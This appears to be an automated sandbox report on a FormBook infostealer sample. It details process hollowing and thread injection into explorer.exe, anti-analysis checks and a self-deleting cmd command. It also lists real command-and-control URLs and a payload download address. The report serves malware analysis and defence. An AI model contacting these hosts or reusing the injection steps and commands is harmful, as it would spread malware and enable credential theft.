      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04554257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Network Connect: 142.250.185.179 80
      Source: C:\Windows\explorer.exe | Network Connect: 23.110.124.43 80
      Source: C:\Windows\explorer.exe | Network Connect: 3.223.115.185 80
      Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25 80
      Source: C:\Windows\explorer.exe | Network Connect: 104.18.194.20 80
      Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe | Network Connect: 23.111.137.154 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\dwg.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\dwg.exe | Thread register set: target process: 3388
      Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 3388
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\dwg.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\dwg.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 130000
      Source: C:\Users\user\Desktop\dwg.exe | Process created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: explorer.exe, 00000005.00000002.461660778.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000005.00000000.271741087.0000000006860000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E120E cpuid

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara match | File source: Process Memory Space: cmmon32.exe PID: 2208, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion22 | OS Credential Dumping | Security Software Discovery721 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion22 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | System Information Discovery311 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

      Behavior Graph


      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph ID: 357209 | Sample: dwg.exe | Startdate: 24/02/2021 | Architecture: WINDOWS | Score: 100

      Start
        DNS/IP: www.resp04.online; www.process-activation.net
        Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
        -> dwg.exe (started)
           Signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 3 other signatures
           -> dwg.exe (started)
              DNS/IP: 45.153.203.193, 49719, 80 NETLABFR Netherlands
              Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
              -> explorer.exe (injected)
                 DNS/IP: www.india-vspakistanlive.com 23.110.124.43, 49742, 80 LEASEWEB-USA-LAX-11US United States; neuroacademyok.com 23.111.137.154, 49741, 80 HVC-ASUS United States; 13 other IPs or domains
                 Signatures: System process connects to network (likely due to code injection or exploit)
                 -> cmmon32.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    -> cmd.exe (started)
                       -> conhost.exe (started)

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      dwg.exe | 17% | ReversingLabs | Win32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
10.2.cmmon32.exe.49d7960.5.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
10.2.cmmon32.exe.26e45d0.2.unpack | 100% | Avira | TR/Dropper.Gen | | Download File

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label | Link
https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxR | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.winningscotland.com/gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb | 0% | Avira URL Cloud | safe |
http://www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ | 0% | Avira URL Cloud | safe |
http://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb | 0% | Avira URL Cloud | safe |
http://www.hhappxz.com/ | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://45.153.203.193/nn.bin | 0% | Avira URL Cloud | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.india-vspakistanlive.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV | 0% | Avira URL Cloud | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 | 0% | Avira URL Cloud | safe |
http://hhspapp8.com/dh5/index.html | 0% | Avira URL Cloud | safe |

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
neuroacademyok.com | 23.111.137.154 | true | true | | unknown
www.process-activation.net | 109.68.33.25 | true | false | | unknown
www.rentcafecloudflaremvccn.com | 104.18.194.20 | true | true | | unknown
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false | | high
bloomingintoyou.com | 192.0.78.25 | true | true | | unknown
ghs.googlehosted.com | 142.250.185.179 | true | true | | unknown
kreatelymedia.com | 34.102.136.180 | true | true | | unknown
www.india-vspakistanlive.com | 23.110.124.43 | true | true | | unknown
www.hamiltonparkpdx.com | unknown | unknown | true | | unknown
www.winningscotland.com | unknown | unknown | true | | unknown
www.ibluebay3dwd.com | unknown | unknown | true | | unknown
www.bloomingintoyou.com | unknown | unknown | true | | unknown
www.resp04.online | unknown | unknown | true | | unknown
www.kreatelymedia.com | unknown | unknown | true | | unknown
www.neuroacademyok.com | unknown | unknown | true | | unknown
www.readingqueens.com | unknown | unknown | true | | unknown

                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.winningscotland.com/gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb | true | Avira URL Cloud: safe | unknown
http://www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ | true | Avira URL Cloud: safe | unknown
http://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb | true | Avira URL Cloud: safe | unknown
http://45.153.203.193/nn.bin | true | Avira URL Cloud: safe | unknown
http://www.india-vspakistanlive.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb | true | Avira URL Cloud: safe | unknown
http://www.neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb | true | Avira URL Cloud: safe | unknown
http://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV | true | Avira URL Cloud: safe | unknown
http://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 | true | Avira URL Cloud: safe | unknown

                                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxR | cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.hhappxz.com/ | cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://zz.bdstatic.com/linksubmit/push.js | cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://push.zhanzhang.baidu.com/push.js | cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://www.sakkal.com | explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical results) | unknown
http://hhspapp8.com/dh5/index.html | cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                              Contacted IPs


                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.25 | unknown | United States | 2635 | AUTOMATTICUS | true
104.18.194.20 | unknown | United States | 13335 | CLOUDFLARENETUS | true
45.153.203.193 | unknown | Netherlands | 35251 | NETLABFR | true
142.250.185.179 | unknown | United States | 15169 | GOOGLEUS | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.111.137.154 | unknown | United States | 29802 | HVC-ASUS | true
23.110.124.43 | unknown | United States | 395954 | LEASEWEB-USA-LAX-11US | true
3.223.115.185 | unknown | United States | 14618 | AMAZON-AESUS | false

                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 357209
Start date: 24.02.2021
Start time: 09:53:01
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: dwg.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@13/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 50.5% (good quality ratio 43.5%)
• Quality average: 70.7%
• Quality standard deviation: 33.9%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 92.122.145.220, 52.255.188.83, 104.43.193.48, 51.104.139.180, 184.30.20.56, 8.253.207.121, 8.248.115.254, 67.26.73.254, 8.248.137.254, 8.248.119.254, 92.122.213.247, 92.122.213.194, 20.54.26.129
• Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/357209/sample/dwg.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

Match | Associated Sample Name / URL | Detection | Context

Match: 192.0.78.25
IKtgCGdzlg.exe | malicious | www.wmarquezy.com/bw82/?9rjHF6y=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YeEGiH+FcCyQowbqQ==&lX9d=p48hVnrp1tqPRT7P
22 FEB -PROCESSING.xlsx | malicious | www.glasshouseroadtrip.com/bw82/?RFQx_=9eHfuSy5bsinEXEf9UcXOob2js7MmdckS7hVoe2yzKUXnEaN1LaM8/a2W/lIeY/LicAkBw==&GZopM=kvuD_XrpiP
IMG_7742_Scanned.doc | malicious | www.vagrantmind.com/gypo/?UrjPuprX=a22oXTEFK1VaKxP6jotNX9moxeWCA++9mvVJflp0ux1+Oqp3qAY+htsSgKT64ou7evePhg==&nnLx=UBZp3XKPefjxdB
D6ui5xr64I.exe | malicious | www.alexcristal.com/kre/?FDHHVLz=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlPxZTSDnQnyx&Rb=VtX4-
9j4sD6PmsW.exe | malicious | www.alexcristal.com/kre/?aR-8_FK0=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlMRjDDjfKAT2&UlPt=DVohLl3xOrmlMF
po.exe | malicious | www.spanishjaponia.com/wtb/?tdcxfR=/SLohMkaSme8KQmscEO5zyeff+NH4C7nb7Kbu7K9qBGaaLOXNqJ/IyUS4tswlt55UVBx&DxoHn=2daDG
SKMBT_C280190724010211.exe | malicious | www.brightandfreshfaces.com/css/?X2MhMfE0=ZN3ViUDOzxg5uhKqZwbFMgY8qo8vAnJC8OVwb1xkx9iwE6Y5op56c5mUT7DJAYlQEeIN&8p=EZTP7L
FEB_2021.EXE | malicious | www.leadeligey.com/bw82/?rp=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ&RR=YrHlp8D
VESSEL SPECIFICATION 2021.exe | malicious | www.v-surf-boards.com/thg/?hdmTvBAH=vedIkwMGAXbyu6oNrwAvvXp483A8bH0EhwZ5FQQQ4sr9cn5ccMruY6e7Q8V7TpjHwSYA&BR-tMX=XPJtkJ38
Docs.exe | malicious | www.w-ciszy-serca.com/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=HhP/jN+N/sXTaZ8/3fGnc0oK8/ih6OJXlCeyiM3x1xpWLsZL7bbd6eZCGkHpoe1MVPjf
